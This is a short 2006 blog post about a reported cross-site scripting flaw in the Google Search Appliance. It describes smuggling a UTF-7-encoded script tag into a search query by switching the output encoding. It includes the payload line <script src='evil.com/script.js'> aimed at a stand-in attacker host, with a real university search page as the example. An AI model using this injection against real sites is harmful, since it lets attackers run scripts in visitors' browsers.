Wednesday, November 29, 2006

google appliance xss

Multiple sources have been reporting a Google Appliance XSS attack. In short, the attack allows someone to tweak the variables sent to a search page in a way that lets arbitrary scripts from any domain to be executed on the results page.

Say I do a search at IU's search page, and when the results are shown to me I am directed to this url:
http://search.iu.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8&...

I can change the q and oe variables such that the q variable has <script src="evil.com/script.js"></script> encoded in UTF-7, and then set oe to UTF-7 so the q variable is decoded. Then when the results are shown, evil.com/script.js is loaded on the page.

This has been shown to manipulate the results page (see this example), but since the URL must be modified, and a search query must have already been submitted, I don't see an immediate use for this.

I guess one thing that could be done is as follows: an attacker could create a custom search portal that ignores the search terms provided by a user, then executes some javascript to screw with their computer. Of course, they must be initially directed to the evil search portal... is there another use for this "vulnerability" that escapes me?

No comments: